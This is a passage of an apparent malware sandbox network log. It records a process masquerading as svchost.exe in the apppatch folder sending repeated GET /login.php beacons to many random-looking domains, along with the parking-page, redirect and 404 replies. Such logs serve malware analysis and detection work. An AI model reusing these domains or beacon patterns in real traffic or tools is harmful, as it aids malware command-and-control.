Nov 11, 2024 18:13:05.657099962 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupycag.com
Nov 11, 2024 18:13:06.077861071 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:13:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=e5cea2794c01fe0d297510f888cbb928\|66.23.206.109\|1731345186\|1731345186\|0\|1\|0; path=/; domain=.pupycag.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	58877	103.150.10.48	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:05.679856062 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Nov 11, 2024 18:13:06.462517977 CET	404	IN	HTTP/1.1 302 Moved Temporarily Server: openresty/1.15.8.1 Date: Mon, 11 Nov 2024 17:13:06 GMT Content-Type: text/html Content-Length: 151 Connection: keep-alive Location: http://106.15.232.163:8000/dh/147287063_134827.html#index8?d=lyrysor.com Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
Nov 11, 2024 18:13:07.500108957 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Nov 11, 2024 18:13:07.771686077 CET	404	IN	HTTP/1.1 302 Moved Temporarily Server: openresty/1.15.8.1 Date: Mon, 11 Nov 2024 17:13:07 GMT Content-Type: text/html Content-Length: 151 Connection: keep-alive Location: http://106.15.232.163:8000/dh/147287063_134827.html#index8?d=lyrysor.com Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
Nov 11, 2024 18:13:28.899952888 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Nov 11, 2024 18:13:29.171669006 CET	404	IN	HTTP/1.1 302 Moved Temporarily Server: openresty/1.15.8.1 Date: Mon, 11 Nov 2024 17:13:29 GMT Content-Type: text/html Content-Length: 151 Connection: keep-alive Location: http://106.15.232.163:8000/dh/147287063_134827.html#index8?d=lyrysor.com Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
Nov 11, 2024 18:13:29.479676962 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Nov 11, 2024 18:13:29.751168013 CET	404	IN	HTTP/1.1 302 Moved Temporarily Server: openresty/1.15.8.1 Date: Mon, 11 Nov 2024 17:13:29 GMT Content-Type: text/html Content-Length: 151 Connection: keep-alive Location: http://106.15.232.163:8000/dh/147287063_134827.html#index8?d=lyrysor.com Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	58882	106.15.232.163	8000	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:06.501164913 CET	290	OUT	GET /dh/147287063_134827.html HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: 106.15.232.163:8000 Connection: Keep-Alive
Nov 11, 2024 18:13:07.289659023 CET	722	IN	HTTP/1.1 404 Not Found Server: openresty/1.21.4.3 Date: Mon, 11 Nov 2024 17:13:07 GMT Content-Type: text/html Content-Length: 561 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:13:07.781213045 CET	290	OUT	GET /dh/147287063_134827.html HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: 106.15.232.163:8000 Connection: Keep-Alive
Nov 11, 2024 18:13:08.089905024 CET	722	IN	HTTP/1.1 404 Not Found Server: openresty/1.21.4.3 Date: Mon, 11 Nov 2024 17:13:07 GMT Content-Type: text/html Content-Length: 561 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:13:29.174089909 CET	290	OUT	GET /dh/147287063_134827.html HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: 106.15.232.163:8000 Connection: Keep-Alive
Nov 11, 2024 18:13:29.470797062 CET	722	IN	HTTP/1.1 404 Not Found Server: openresty/1.21.4.3 Date: Mon, 11 Nov 2024 17:13:29 GMT Content-Type: text/html Content-Length: 561 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:13:29.756979942 CET	290	OUT	GET /dh/147287063_134827.html HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: 106.15.232.163:8000 Connection: Keep-Alive
Nov 11, 2024 18:13:30.529803991 CET	722	IN	HTTP/1.1 404 Not Found Server: openresty/1.21.4.3 Date: Mon, 11 Nov 2024 17:13:29 GMT Content-Type: text/html Content-Length: 561 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	58927	64.225.91.73	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:11.706023932 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galynuh.com
Nov 11, 2024 18:13:12.961796999 CET	816	IN	HTTP/1.1 200 OK server: nginx/1.18.0 (Ubuntu) date: Mon, 11 Nov 2024 17:13:12 GMT content-type: text/html content-length: 593 last-modified: Wed, 22 Feb 2023 21:25:52 GMT etag: "63f68860-251" accept-ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED] Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>
Nov 11, 2024 18:13:12.963551044 CET	816	IN	HTTP/1.1 200 OK server: nginx/1.18.0 (Ubuntu) date: Mon, 11 Nov 2024 17:13:12 GMT content-type: text/html content-length: 593 last-modified: Wed, 22 Feb 2023 21:25:52 GMT etag: "63f68860-251" accept-ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED] Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>
Nov 11, 2024 18:13:12.964209080 CET	816	IN	HTTP/1.1 200 OK server: nginx/1.18.0 (Ubuntu) date: Mon, 11 Nov 2024 17:13:12 GMT content-type: text/html content-length: 593 last-modified: Wed, 22 Feb 2023 21:25:52 GMT etag: "63f68860-251" accept-ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED] Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	62034	76.223.67.189	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:12.966931105 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qexyhuv.com
Nov 11, 2024 18:13:13.402798891 CET	259	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 11 Nov 2024 17:13:13 GMT Content-Type: text/html Content-Length: 114 Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	62036	103.224.212.210	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:12.971513033 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com
Nov 11, 2024 18:13:13.522627115 CET	340	IN	HTTP/1.1 302 Found date: Mon, 11 Nov 2024 17:13:13 GMT server: Apache set-cookie: __tad=1731345193.2353053; expires=Thu, 09-Nov-2034 17:13:13 GMT; Max-Age=315360000 location: http://ww25.lyxynyx.com/login.php?subid1=20241112-0413-1393-8b92-799b17a46fa8 content-length: 2 content-type: text/html; charset=UTF-8 connection: close Data Raw: 0a 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	62035	44.221.84.105	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:12.971652031 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyciz.com
Nov 11, 2024 18:13:13.401648998 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:13:13 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=15448eee74eec9b30dccd9753fd1ef5e\|66.23.206.109\|1731345193\|1731345193\|0\|1\|0; path=/; domain=.gadyciz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	62037	154.85.183.50	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:12.971950054 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
